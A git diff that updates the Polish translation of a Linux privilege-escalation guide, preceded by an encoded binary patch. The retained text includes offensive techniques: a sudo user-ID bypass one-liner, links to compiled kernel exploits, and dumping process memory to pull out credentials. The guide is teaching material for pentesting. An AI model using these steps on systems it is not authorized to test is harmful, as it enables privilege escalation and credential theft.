zXis!Trf*b6Iz4q&>wM*)_QBGnv(*Zy%0_FBmL>}SmSyo5`V@cd8*qtbMGJsWoi@v@
zlCmU<s$3Fwpy8Io8;_Uv6PCdD2^<uBZ!>RZl17%Q9m3gIrzTUSB*+t$>5%YU^`%98
z0CXz`@c(6m-#kWX@3ZyPK~hq5(EL7pXn1&c4)AsesayKA*O)x~g41Mr5G<c7AL8-W
z(9u*1dl}uK0^RO8sh)5k`6T2^;^M!+J;`hPnMf+~(n<QXOOH6Voil}t4SUtpp{!7&
zVm4sDp?&nF)(MxKyYKxDHN3GJ3$V2%4rx$E{tQ=<yOo>I5h09KEG~lW(v?U%B9hM4
z%SJ;y0v-yV(C{}PE@>9pu^H$Ezn}YO;N@hdRw(uyAv=8}yzPuR(PiK<^Sw<GSjkw9
z@ddA~x-s_cfGmj=hUYvP2XkI{ot<)Zz!s`8rLr{uj^kiiZEEAk$*LQamtQ5jVrkG*
z9)gi?5cWJEsi}+&#yFnc_eoQHxsZ1C2$tb@ZSZ%va^T3PGUc2{UzJeX@-1h!R;51I
zB)lFuKI*z-C^X&dJ(9%R6D}wg_H+U8$;2TlQN%H~zYw&yuWRL>v5P*O$KUk&J`y(t
zD1eE&ReDT)R&F1J&AZ;-%u579&M+Z~77op_i<E-Sk><nOj6~bi7My+Ra>I-iZ|Wok
zq7!r&#XKc*(>XFyu^5^YE=nAr4&SEa9YE-xN$F~b+kXV~t~fMjdRSGK{=#N+Jt@=l
zts&JrPt-GVVmj=ve6(#w2!9vB47az|($JslvcvCETEp{Mf&I@%1>Ne&rl$HfL2E%?
z<MFaf6jPU(nVJ4b_w`2_O&q*R+u^a_;JL^1N_@lZ50^6Gagv~#DB~{C$nL8K4hF%W
zUI%(Ik(QT(%2AjVH}%&}XX4ywn+)11zT=$DJ>lr##!_K?WgTTnL}+EyJ;YuAT*Rph
zT$}3;RY!)EwNasc=#a7|;`vf0yVQAg=2DQ${{2px61t~y^B(?{w|hE#_WL50R6Q46
z#6|eJ)us{eUx+^{`bi7Y*3J7eqt>#rHdk#~XV0LQWJnfvEqnt!%c%M4GXRRf2^S_+
z^5Lqsc=*i@!B!*Ua-3bY@&X;HI<#c-)f~uK$JE=NAo~pSp~?#={>i1Dk;a=eJg~92
z{n<WdMK`L=t@2R>p0x<pub8q|X+c^YdBKclSKKLJ>jCNXlT%lZve&Mf?X(4Kbz0jc
zH<Ybb8DAnCHd4T$PiHw;v$U;*m=Y1;%LUrGCH80E@89-`!<19MR-iZr^gI+hs0}Av
zvqk+cwdBb3pYe-&s8<ANL0FI!$egbIAtBZ(3aiJMQrOth{7nm4u*``)=Rn3ix4j`q
zQZTAEePmN<<vOzR`Fjc7@m<C@tLp&1xkMbKw#OlLn^~w5_Qg*OmnR?fIEHp`b^MG@
z!yn3*l$XCv+dxMt(U2_j4ZspA1SSwWaY+HB<L@oy#A%uqJVVY!0ZiA@Gx_nG{kuI!
zG?1OlfZ8=QOrVKwZ)l-lG=yFGa_NrH5&IQ_Yn;s9#`cV4pm1xY4;}LW8=F;-WnTWE
z!Hg?m!3`5B53V-on)*Qxi-V)%YJe^JzNZ0efcrpci55YA<_qDeI|uK()E2LyQxV}o
zcYiRVR45X`QhTfc^J_**h}$idmCkO=b$6~OV<C-aPe3*1V>uf8cWRtvqE0W!;#V|r
z8t2;2&YWrpSo$w+bpP4$ZbY4=3kFY`nIIuY-TS*wtWMD%ryf*OfFb#$Km4{*E6pt<
z6!ZOdnN{)&C^*+V145QvS3dUbXQY|F2kUb7sYHFI>#v~0jVAv1gviK6(6XBY@azo6
zk>;e4`&#WCYzvs_`GT%1N%iYgMpsZeYWw<Lh;@zjy#)-|jC)Mh9_zb_lHwKVvAgJv
zF`%>`;TmBUjDsR-d=U}+N9_KZj}-rS%cv5CH?P{F=4Jvt26ivvdmT_e86zwQ4zcG<
z*G({BHq}GeIW*9~6iW685Ee%BQqhM5AQW14<(~%Deda(^Ha|<kG)8Z#R4kpj9w;~C
zo41eHQ`k)(ICV{7h(R^Zms4~Rqf4GUqR(>LVU7G536#EUlu=B9#~v>pz_6tUV73BU
zu{OSozfUganwzhq$_+zuZUkz-ZuJj#7VT@K^=|=uO(M#F0(?&R-C1g?P$v#wN`+j`
zeDIHW_I83iJB905`yl!Tw{Bb5@nH*t&UCXIlFlM3GBQ4Z8aza}gcC{48UL8DvBS8%
zpubMEXCYaeP(8qTPe>^uf5oD59UrggmZ=MhMLjPgVE)s@)K|SsCQg!WqrzHq=(2G~
zl}w~db_m(l_f!?{{#k)E2_VnX1n)$zp_{MTR^MT4{Xdp98p7CaE_m(>HomxQ04OGc
z61zF?3)zN7M{A5>5v`~zry9pBo*3#ck8a`ai2r7X*puDOJQF#!++Hv8e|ajtIO{~H
z>ocEi?sF@D_+di2>rE|#8jl^Rdcy78-^jb>>5xOvVE_DL+K#ZpbUFwc^rysdH>bM#
zh3Fjrtw>=*DalxQ|Fi7+PEUrLHYzNmCqbA`c|PP+-Cu7j3!iNRP%7MlYevPKW)BS|
zz-N<!v+ca*q0$yl=v_{O`ATmaMJP}0XIWremExMpkEKm%z5tq%RtsGHw%+b{{n42!
z%!xPZOcu_zH46$Y=xcq|?d>-ko~+B{)P$%eT`3l?f?WfSkmakkgtXI5r&V|b&Uc<a
zFp}!Y4oXSbM=VHQ3xZkRtgDml-}@RIwfN`02c3S`6d>Nq-iR1zpZ7y`N7Lb1pEOeY
zZng*+eN2j~-oxoD8K8uApIOZ_$}ht$8$>>ofdxhzo*o??58i!xdKTUwZflo$W9n#g
zR$7{1d3K0BXsQ-_oq}A;t%od0ivhsBCnhQr^vF7+Ccn{Mz2s@g>W@hjSJHs_6qzSr
zqzT-s&gGCbH(3<@&rk;~mWvlIcrl9?4_rA`3?r(}$Qo6(I$(X*cSBY=@=o|!SA?9u
zztSy}158Ga7A<mz>{0i96z%Of#|LV+w_=s(%)SR!AV;_BS94V63msV=I!xA?H}6XM
zgAjh->o|`NTOG;sxC#7e7z+>iK^@4mS79uK;Eu&=^WhSNU)CalXJO)St$(!pl<biB
z1Z$=pGjT9k+zzv6%1LQyX*zR7nNWM)4>$xS&I)0X@{u!PIAw_K;24oT%^OyBD<7BP
z6^&HI6``yUR^gh9;@?$YYd=l~w4kOiC1p6Jb<f))k7v}cMdFcs=uVt%VStVimV4<(
zK>AvXjf~EvC=gJRgF9{9;qLbG@*SkJv$NSf$BsF3Ok4W+erklq`4tvNci!3C$EtAw
zWJ^_D*0+(>Kt+eg^$hQF3ji#Ci)CGF|8~gsc0E1Fcv^Vqgj2nhSPS|u9XBx?XSpD`
z{!kLu(j)<m@?{<z6CHNEg0;6_<N7>3!#xz`-uhJd{hlQ32XSn(+8r>kWY1`L${8t@
z5Oij&D;|K`Bi${QAX&2D6~)Sh-ld+4+q%6M$ZJs@fxM8plW*426}=L&KD&LN?$fmp
zFBfz;S#w=>LzLoI9@by^lkDdR<^I}=6nNdNK-s{9Ph<tylEVw>mH6mhPngqZ#yzy_
zr(|~M(;55DIqM#>ctWFc=8`gUY*d9|d>1%$D^hm!9dE6@Ke2zi;!Y2R_?!pv8=)OO
z2=W}yVE2Lp3X$ojDPE_$eG`uMAzJu78?+j{V+g<O4F1h^Zm)3SZMD-Bw%UW=j}ULQ
zGAF$p)78-_Gr}4+1>sPV-z0>02Wmn?$0wSPeMWsNRcy6x*5uQQP^w7Dvjp3bn+eo|
z26as{T=@q2Et1Ba)9lWgODv4o*T&QVYn;Z`v;`ipojNOtd`3(A!~LEL9E@bD)Fp=J
zxWxUpJ!)IJvarGPjZLIB3-&PQp+R?^%;WW5p*{D1ZqAI4d*DjBX9atF;fCsJ^EISy
zli|X`JSmn1TQ=6V{dp=;rag)w&BHvZBkk&tU?0H9)Mn5GapEb(O4jo>-c#T6HWB-F
zv@AUzjh?$1<prLU>-@FpLX$Hy0opUs#z*gX0VUJcOMxi^*zb(;tmmWQKwKfhMfr{J
zd?t!xE<|hgmcnK}GHympOZ7bnu^SR1ENfk9HRGT@{Xk6Ikc+oICQ-nDa!ya>X@Ss`
zptLX3!kN=1q%uybCnkVO$&BT{JHzc;3dymM{)R1XIbVJOS`z~ZvDqi$U2drpGT)_4
zYFTBDGV;MG<MT1^-NwzXXYN9CyJi+fLQ_`K^<zPn$Xm@G<^iP)2E(pVFA6@8W=})?
zOHVp~>qbl36;`sV0Ni{)qIwr*?C%Kp-;KY23MgNuo(9ZM4ihfl=CcjA1tVw$y5|Q%
zJ;wSgVM{(`aWYhc2R7p(0`~2W%S~>%!E^DUB?}kzOxq8cv6@G~JXecjxp=s4jzy{J
zX{W*v@5$FM0uhKgi&J7qf=njNVCRP3&p&xFJ%x&0_N8~pxp$*^_aYMqZ3=ODX8Xfm
z`Z4#Do;+$C!xPGn{k<A&-)>My+Z%O0nRXQDLg5LIe&(P|xfJ_Hj{zLAy^5{1!Yth#
zT3|%|2f|YJt=U?80~l4D={K>iVk@dwO&baiaB%3Jt18^pQOqBPa`AKo`J=7GE~P^e
zhIG#IPRI12DZwWV;oR+&*K}Yp7zCgExnCJ3YM%Q&o87`0GPRdG`txu_ILB7Rye!Po
zB#)ap)Rqm>9(9739ZJ#Z30=G!oQ6T9Sv5sDo0*mf%5<^OA1qZ+m@F!c4#F;jB@YPO
zJ1u4LQwg}8yq&6@NN-$<o42c?LQpJwO;Lkx;dM5EB7?so@Ui;BUT-|o?17|AIG;mX
zEj8A*Hf*YLBL22Cu?31phQI43^Giw$(ncu2aRy3MYB%pH=EhZY1H=%kZoVV@Hu!b>
zi&)gps6jue`Q_E6PlP?6p0Um#*ii(KSdRB;MJO$Z5kn*Sb|_DKK4L4Py<XXe&N+|W
zupr%4@KQQ_gMGWLo?XV+hC&h+-On)~jKi~})Ysonu+r+$XmHlC=mfY#q4~%ud4$oO
zuOwoT(aJ~Djx9z*x-y`_SA$F2u=8e%eRd<WCtv1xaU<;A9FbnPO!$kv8tF8<KW#kA
z7{8sYO!SSSyINK_u#I7XNYO@10VPYaJWH8pHU@{@O7O*F?3{m;DkTFx+@n4Z)olAM
zmVC01a<l+I7ca17%SR(o*xn#<0bjrfKmI8*@`x6o6@yN6X~}KsWd^ffM=A$yodb84
zcX~S5a8cujCV5MqH9}W(7kw?5`dMj%F|tQoT=G~@2A)F>_%&pd#Mb89e556v&{K}-
zBE<e)5rl*?f9ia@jTd@pXW&COhxCk=!(pn2<q7lz9EkWl#SaR*C6_yN4*(b2Qvq4f
zibf95<mLh7_66LTqnYeFAj-({gQRxG*g|DYMn#>PSVGmEgXk%4M0-1#&rB%I;B{n~
zj#FB9$M|;MbdE)IUx$R{YMo22?^oD{f6IQ>OEvfuwikZZ#jTq})RA>*<UYyiCrj#y
z3<Z{azy>(D%?)VuE{q~)iTxrI-QsIFI4XNxA0_L$XfzZ$C@x@Z)luC<I=D`Y!kxmf
z++0bdUWQgzB3JYUpcHP~9C1ThrITHG@nHyx7c`Jny*_1+0)-v@Yw3%7=1RuHGS3*g
z1G0v*<g7ukL*N)S-JMW{E~}i^{#<-0fZ1C%UG{Y*HHMD&-jK>_3*2{|{BiI^rg2_!
z*U)iK;;GPHx}?Vz{NPqso&@t}uvuj@Anxi(3_3AV#cc!dI=rEmu?)O-JAT9V(@F}8
zws<*dD{d}HUr<lAYALbDuU4KQQB7k<I3)kung*DVzdrY$0M-U5E<^k8`H7MQN+d5#
zq7ej{$#>#x21nF%t7f`ZzS5UHunDvjHVqgJRxPmryZ{9a?>?y#(H1d>RHWF?HQovT
zT&L2`AD-a#fERmQ05r-egm-&BCLS>)MZB4sAE(81sl)uDtKMtDUL9VJl(e{ZV2rMv
zCRU&M&>{IV-LAO)(Kq)3{<&Et0rz_SuP@tEWBa(cG`N3-vwf}OdFG8oDFLzon`9+E
zVmW{kmI}Dpq!LkaF$Q1mo1Qcg4bm<-R{i3W(_Iu^VuaNY3Niib1_9@0J(ZfU&&7`-
zv#B`A!QULBKOpGL`z8&in<d%pWdBHmA-U1D%D<Cw(MK>{+tiF@R|tt5-(yA{1E~yl
zF#qKPble-UV8quyzA0#1Wbyi8<<~hKSD$0K9uGc=wuie7ba0`Rho@x^B4|WQhuI7w
z29sfNG5+oR8gvInAv9v8u21hKCNm5DmBYjZ6o3&Xvdl_q?T9zbo3Ac9EzbuLT&jF7
zZ}r>HX6PYrTY}vCBu@-UW8E|Ld7FSzvaX3p9)G2g<GQbu5EF>X{%3=gJac3V9$Pnv
zM^gJ(?VD2V=69=amp7hIw*-fky&o|(9f0R>gDMvY2G@gxoux<ycdjECGttMx5TAJl
z1wMFA)fnQd*0=qSV9vV~|3VD0T)2kv@^bo%5WeVdnmwuSV5OOn9s@c8#!&owpO(BU
zdhOJFy@jU6Y;&jS1sIJ;OgoP?ecW^A$I-`=1}8V9ruTt<s}N6YJo&Gm0DmGKJ-u!G
zwPpVugBAwE$?eFOj^~U_^Rq*|Spj6uoD#C;rstxx*~#HTwT)1J_C~4UyR;75&bDLn
zFseh&%T6`euJmPu>nVbw=KAWk`NFZUPo%wC=W4}vYQbbUS?PoW>Czuj+@EP1Lbqnz
zdEwrZb2w*3pdNKKc_bzVF3P(=ke)_?&N3<eO~X8M(x^^w{P8v^rkU-EA+=g#rc0+x
zFs66iuPU}p?oE(}^KUIKn&V=<6yF)ty~lTR@GsGhs&yh=e?m&EYj+FNt*d3`cG6NI
za=xu$Z?DBhUi-q=(4XgH6&M0TXojNKAXc~Ww(}xTm$8ceo{R&_z7{?&gFuOdRK7o)
zPmE&QsyV{<S+h9Uc9~4ulC*Z!DX0cM`?Eual^Dyz+83#I-#?aKBF4kcO#oO2ZelXy
zt{0uM^|HBJ!A`l6<dliZNd|;hv8%-+O}1P@gSyfQKPH>Iv%77j9@=$=@6Xmr4rFd~
zcZ1@fEXAr}rky+Q+bb$4x<X)=dA%HgT9p{NbJCdkC2tl;lvkX>Ey&xCY~S1)sp{B$
z_@%x(5<MB?D!95lvT`-Iv@C{g{LqG@U1I{-6IV9>6+iwRNEU2y&G<`)G$l8wXMmdm
zbUGe3Y*oWD9Z!f?u*hWmv{ZHRFG@8qkY^mMwM%yyo^jVmySKMqXrirL1sWCch4q;`
zO&W-{<L^qsI>R{IzaSB?wqs^U^YQCSeXTEI-ivJc#Vsu@b&ZXU-arMx44R40UPa>?
zu>#l>5qfxd3?enA2o9gqu73rZMyrS1emK-Si<fxKY?|9N93i%t2!A_ad?KAu-Z9Uo
zz9MGEz8Z61;Ap+-<;#Hr6ws;$7*b#W2=6m%Z8=e7^Ud05vPGuxuY&oH@BH=tRgki{
zVrnDhU)~7+pG*6{F7rR%3pf#g;aX%>Rh9Ee&_0JG(59o8+56Y9ym??v{a<9S|NH&@
z`$hi0{&Lk~B*|mL6B)>J;vZ=ia*f)A1Y|-*M@V#6f%Z<C4c_+G%}Fv4E|?I?iVVQ{
z=gU7Y;h&Z8&o2097yRcg*rL6??bn9)KSj!g&)1Aw{AC9=b`Mu9!?gl%(7~;q%(6le
zaJl~}#G(m^GsgSRoG*Q45P{`HP*w!o$@>$;Xqo!&#b;bxB~>(~!ruzy6>yWJn$aSI
z{~YIk^9vXpoq)?3{<l_ziE1m4^&5@4|7oy)HW?uy(8fRwivBwXPisPe_Q->D2e!ZS
z7*HrejW~%F_wQ_FG$$y(piq2P?(dv`tUy~mYM#5`zcnNGfC;&0|1sq63=fHH<>9>_
zNccakuRjm@3Yd^rQ?4X`Yj^<x+7EKT6#vb<{^uMC5WzSFKdjOIt>J-y_l6{5|Ih#O
z-~6IaiBNlD^G)z?4ey_Y{O>jX&qDt98b|-LkpI20{)x!{4%YwQN91$7ds<oH;!}9X
QIKZE(qNc)oIg`Nu1!)r{CIA2c

literal 0
HcmV?d00001

diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md
index a9d4639d2..8c2eda644 100644
--- a/src/linux-hardening/privilege-escalation/README.md
+++ b/src/linux-hardening/privilege-escalation/README.md
@@ -6,15 +6,15 @@
 
 ### Informacje o systemie operacyjnym
 
-Zacznijmy zdobywać informacje o działającym systemie.
+Zacznijmy od zebrania informacji o uruchomionym systemie.
 ```bash
 (cat /proc/version || uname -a ) 2>/dev/null
 lsb_release -a 2>/dev/null # old, not by default on many systems
 cat /etc/os-release 2>/dev/null # universal on modern systems
 ```
-### Ścieżka
+### Path
 
-Jeśli **masz uprawnienia do zapisu w dowolnym folderze w zmiennej `PATH`** możesz przejąć niektóre biblioteki lub binaria:
+Jeśli **masz uprawnienia do zapisu w dowolnym folderze znajdującym się w zmiennej `PATH`**, możesz być w stanie przejąć niektóre biblioteki lub binaria:
 ```bash
 echo $PATH
 ```
@@ -26,26 +26,26 @@ Czy w zmiennych środowiskowych znajdują się interesujące informacje, hasła
 ```
 ### Kernel exploits
 
-Sprawdź wersję kernel oraz czy istnieje exploit, który można użyć do escalate privileges
+Sprawdź wersję kernela i czy istnieje jakiś exploit, którego można użyć do eskalacji uprawnień
 ```bash
 cat /proc/version
 uname -a
 searchsploit "Linux Kernel"
 ```
-Możesz znaleźć dobrą listę podatnych jąder i kilka już **compiled exploits** tutaj: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) oraz [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\
-Inne strony, gdzie możesz znaleźć kilka **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack)
+Możesz znaleźć dobrą listę podatnych kerneli oraz kilka już **compiled exploits** tutaj: [https://github.com/lucyoa/kernel-exploits](https://github.com/lucyoa/kernel-exploits) i [exploitdb sploits](https://gitlab.com/exploit-database/exploitdb-bin-sploits).\
+Inne strony, gdzie możesz znaleźć niektóre **compiled exploits**: [https://github.com/bwbwbwbw/linux-exploit-binaries](https://github.com/bwbwbwbw/linux-exploit-binaries), [https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack](https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack)
 
-Aby wyodrębnić wszystkie podatne wersje jądra z tej strony możesz zrobić:
+Aby wyodrębnić wszystkie wersje podatnych kerneli z tej strony możesz zrobić:
 ```bash
 curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2>/dev/null | grep "Kernels: " | cut -d ":" -f 2 | cut -d "<" -f 1 | tr -d "," | tr ' ' '\n' | grep -v "^\d\.\d$" | sort -u -r | tr '\n' ' '
 ```
-Narzędzia, które mogą pomóc w wyszukiwaniu kernel exploitów to:
+Narzędzia, które mogą pomóc w wyszukiwaniu kernel exploits to:
 
 [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\
 [linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\
-[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (uruchomić na ofierze, sprawdza tylko exploity dla jądra 2.x)
+[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (execute IN victim,only checks exploits for kernel 2.x)
 
-Zawsze **wyszukaj wersję jądra w Google**, być może wersja twojego jądra jest wymieniona w jakimś kernel exploit i wtedy będziesz pewien, że exploit jest ważny.
+Zawsze **wyszukaj wersję jądra w Google**, być może twoja wersja jądra jest wymieniona w jakimś kernel exploit i wtedy będziesz mieć pewność, że exploit jest ważny.
 
 ### CVE-2016-5195 (DirtyCow)
 
@@ -59,23 +59,23 @@ https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c
 ```
 ### Wersja Sudo
 
-Na podstawie podatnych wersji Sudo, które pojawiają się w:
+Na podstawie podatnych wersji sudo, które pojawiają się w:
 ```bash
 searchsploit sudo
 ```
-Możesz sprawdzić, czy wersja sudo jest podatna, używając tego polecenia grep.
+Możesz sprawdzić, czy wersja sudo jest podatna, używając polecenia grep.
 ```bash
 sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]"
 ```
-#### sudo < v1.28
+#### sudo < v1.8.28
 
 Od @sickrov
 ```
 sudo -u#-1 /bin/bash
 ```
-### Dmesg: weryfikacja sygnatury nie powiodła się
+### Dmesg signature verification failed
 
-Sprawdź **smasher2 box of HTB** jako **przykład**, jak ta vuln mogła zostać wykorzystana
+Sprawdź **smasher2 box of HTB** w poszukiwaniu **przykładu**, jak można wykorzystać tę vuln.
 ```bash
 dmesg 2>/dev/null | grep "signature"
 ```
@@ -86,7 +86,7 @@ date 2>/dev/null #Date
 lscpu #CPU info
 lpstat -a 2>/dev/null #Printers info
 ```
-## Wypisz możliwe zabezpieczenia
+## Wymień możliwe środki obrony
 
 ### AppArmor
 ```bash
@@ -123,15 +123,15 @@ cat /proc/sys/kernel/randomize_va_space 2>/dev/null
 ```
 ## Docker Breakout
 
-Jeśli znajdujesz się wewnątrz docker container możesz spróbować się z niego wydostać:
+Jeśli znajdujesz się wewnątrz docker container możesz spróbować z niego uciec:
 
 {{#ref}}
 docker-security/
 {{#endref}}
 
-## Dyski
+## Drives
 
-Sprawdź **co jest zamontowane i odmontowane**, gdzie i dlaczego. Jeśli coś jest odmontowane, możesz spróbować je zamontować i sprawdzić, czy nie ma tam prywatnych informacji
+Sprawdź **co jest zamontowane i odmontowane**, gdzie i dlaczego. Jeśli coś jest odmontowane, możesz spróbować to zamontować i sprawdzić, czy nie ma prywatnych informacji
 ```bash
 ls /dev 2>/dev/null | grep -i "sd"
 cat /etc/fstab 2>/dev/null | grep -v "^#" | grep -Pv "\W*\#" 2>/dev/null
@@ -140,17 +140,17 @@ grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc
 ```
 ## Przydatne oprogramowanie
 
-Wypisz przydatne binaria
+Wymień przydatne binaries
 ```bash
 which nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null
 ```
-Również sprawdź, czy **jakikolwiek kompilator jest zainstalowany**. Jest to przydatne, jeśli potrzebujesz użyć jakiegoś kernel exploit, ponieważ zaleca się skompilować go na maszynie, na której zamierzasz go używać (lub na podobnej).
+Sprawdź także, czy **jakikolwiek kompilator jest zainstalowany**. Jest to przydatne, jeśli musisz użyć jakiegoś kernel exploit, ponieważ zaleca się skompilować go na maszynie, na której będziesz go używać (lub na podobnej).
 ```bash
 (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; which gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/")
 ```
 ### Zainstalowane podatne oprogramowanie
 
-Sprawdź **wersję zainstalowanych pakietów i usług**. Być może jest jakaś stara wersja Nagios (na przykład), która mogłaby zostać wykorzystana do eskalacji uprawnień…\
+Sprawdź **wersję zainstalowanych pakietów i usług**. Być może jest jakaś stara wersja Nagios (na przykład), która mogłaby zostać wykorzystana do escalating privileges…\
 Zaleca się ręczne sprawdzenie wersji bardziej podejrzanego zainstalowanego oprogramowania.
 ```bash
 dpkg -l #Debian
@@ -158,42 +158,42 @@ rpm -qa #Centos
 ```
 If you have SSH access to the machine you could also use **openVAS** to check for outdated and vulnerable software installed inside the machine.
 
-> [!NOTE] > _Zauważ, że te polecenia pokażą dużo informacji, które w większości będą bezużyteczne, dlatego zaleca się użycie aplikacji takich jak OpenVAS lub podobnych, które sprawdzą, czy którąkolwiek z zainstalowanych wersji oprogramowania da się wykorzystać za pomocą znanych exploitów_
+> [!NOTE] > _Zwróć uwagę, że te polecenia wyświetlą dużo informacji, które w większości będą bezużyteczne, dlatego zaleca się użycie aplikacji takich jak OpenVAS lub podobnych, które sprawdzą, czy któraś z zainstalowanych wersji oprogramowania jest podatna na znane exploits_
 
 ## Procesy
 
-Sprawdź, jakie **procesy** są uruchamiane i zweryfikuj, czy któryś proces nie posiada **więcej uprawnień niż powinien** (może tomcat uruchomiony przez roota?)
+Sprawdź, **jakie procesy** są uruchamiane i zweryfikuj, czy któryś proces nie ma **więcej uprawnień, niż powinien** (może tomcat uruchamiany przez root?)
 ```bash
 ps aux
 ps -ef
 top -n 1
 ```
 Zawsze sprawdzaj, czy nie działają [**electron/cef/chromium debuggers** running, you could abuse it to escalate privileges](electron-cef-chromium-debugger-abuse.md). **Linpeas** detect those by checking the `--inspect` parameter inside the command line of the process.\
-Również **sprawdź swoje uprawnienia do binarek procesów**, może będziesz mógł nadpisać którąś z nich.
+Również **sprawdź swoje uprawnienia wobec binarek procesów**, być może możesz nadpisać którąś.
 
 ### Monitorowanie procesów
 
-Możesz użyć narzędzi takich jak [**pspy**](https://github.com/DominicBreuker/pspy) do monitorowania procesów. Może to być bardzo przydatne do identyfikacji podatnych procesów uruchamianych często lub gdy spełniony jest zestaw wymagań.
+Możesz użyć narzędzi takich jak [**pspy**](https://github.com/DominicBreuker/pspy) do monitorowania procesów. Może to być bardzo przydatne do identyfikacji podatnych procesów uruchamianych często lub gdy spełniony jest określony zestaw warunków.
 
 ### Pamięć procesu
 
-Niektóre usługi serwera zapisują **credentials in clear text inside the memory**.\
-Zazwyczaj będziesz potrzebować **root privileges**, aby odczytać pamięć procesów należących do innych użytkowników, dlatego zwykle jest to bardziej przydatne, gdy już masz uprawnienia roota i chcesz odkryć więcej credentials.\
-Jednak pamiętaj, że **jako zwykły użytkownik możesz czytać pamięć procesów, których jesteś właścicielem**.
+Niektóre usługi na serwerze zapisują **credentials in clear text inside the memory**.\
+Zazwyczaj będziesz potrzebować **root privileges** aby odczytać pamięć procesów należących do innych użytkowników, więc jest to zwykle bardziej użyteczne, gdy jesteś już root i chcesz odkryć więcej credentials.\
+Jednak pamiętaj, że **as a regular user you can read the memory of the processes you own**.
 
 > [!WARNING]
-> Zauważ, że obecnie większość maszyn **nie zezwala na ptrace domyślnie**, co oznacza, że nie możesz zrzucać innych procesów należących do twojego nieuprzywilejowanego użytkownika.
+> Note that nowadays most machines **don't allow ptrace by default** which means that you cannot dump other processes that belong to your unprivileged user.
 >
-> Plik _**/proc/sys/kernel/yama/ptrace_scope**_ kontroluje dostępność ptrace:
+> The file _**/proc/sys/kernel/yama/ptrace_scope**_ controls the accessibility of ptrace:
 >
-> - **kernel.yama.ptrace_scope = 0**: all processes can be debugged, as long as they have the same uid. This is the classical way of how ptracing worked.
-> - **kernel.yama.ptrace_scope = 1**: only a parent process can be debugged.
-> - **kernel.yama.ptrace_scope = 2**: Only admin can use ptrace, as it required CAP_SYS_PTRACE capability.
-> - **kernel.yama.ptrace_scope = 3**: No processes may be traced with ptrace. Once set, a reboot is needed to enable ptracing again.
+> - **kernel.yama.ptrace_scope = 0**: wszystkie procesy mogą być debugowane, o ile mają ten sam uid. To klasyczny sposób działania ptrace.
+> - **kernel.yama.ptrace_scope = 1**: tylko proces macierzysty może być debugowany.
+> - **kernel.yama.ptrace_scope = 2**: tylko administrator może używać ptrace, ponieważ wymagana jest capability CAP_SYS_PTRACE.
+> - **kernel.yama.ptrace_scope = 3**: żadne procesy nie mogą być śledzone za pomocą ptrace. Po ustawieniu wymagana jest ponowna inicjalizacja (reboot), aby ponownie włączyć ptrace.
 
 #### GDB
 
-Jeśli masz dostęp do pamięci usługi FTP (na przykład), możesz uzyskać Heap i przeszukać go w poszukiwaniu credentials.
+Jeśli masz dostęp do pamięci usługi FTP (na przykład), możesz pobrać Heap i przeszukać w nim credentials.
 ```bash
 gdb -p <FTP_PROCESS_PID>
 (gdb) info proc mappings
@@ -202,7 +202,7 @@ gdb -p <FTP_PROCESS_PID>
 (gdb) q
 strings /tmp/mem_ftp #User and password
 ```
-#### Skrypt GDB
+#### GDB Script
 ```bash:dump-memory.sh
 #!/bin/bash
 #./dump-memory.sh <PID>
@@ -215,7 +215,7 @@ done
 ```
 #### /proc/$pid/maps & /proc/$pid/mem
 
-Dla danego identyfikatora procesu **maps pokazują, jak pamięć jest mapowana w przestrzeni adresowej tego procesu**; pokazują też **uprawnienia każdego zmapowanego regionu**. Pseudoplik **mem** **udostępnia samą pamięć procesu**. Z pliku **maps** wiemy, które **regiony pamięci są czytelne** i ich offsety. Wykorzystujemy te informacje, aby **przesunąć wskaźnik w pliku mem i zrzucić wszystkie czytelne regiony** do pliku.
+Dla danego identyfikatora procesu (PID) **maps pokazują, jak pamięć jest odwzorowana w wirtualnej przestrzeni adresowej tego procesu**; pokazują też **uprawnienia każdego zmapowanego regionu**. Pseudoplik **mem** **udostępnia samą pamięć procesu**. Z pliku **maps** wiemy, które **regiony pamięci są czytelne** i jakie mają offsety. Wykorzystujemy te informacje, aby **przesunąć wskaźnik w pliku mem i zrzucić wszystkie czytelne regiony** do pliku.
 ```bash
 procdump()
 (
@@ -230,14 +230,14 @@ rm $1*.bin
 ```
 #### /dev/mem
 
-`/dev/mem` zapewnia dostęp do **pamięci fizycznej** systemu, a nie do pamięci wirtualnej. Do wirtualnej przestrzeni adresowej jądra można uzyskać dostęp za pomocą /dev/kmem.\
-Zazwyczaj `/dev/mem` jest czytelny tylko dla **root** i grupy **kmem**.
+`/dev/mem` zapewnia dostęp do systemowej **pamięci fizycznej**, a nie pamięci wirtualnej. Do wirtualnej przestrzeni adresowej jądra można uzyskać dostęp za pomocą /dev/kmem.\
+Zazwyczaj, `/dev/mem` jest czytelny tylko dla **root** i grupy **kmem**.
 ```
 strings /dev/mem -n10 | grep -i PASS
 ```
-### ProcDump for linux
+### ProcDump dla linux
 
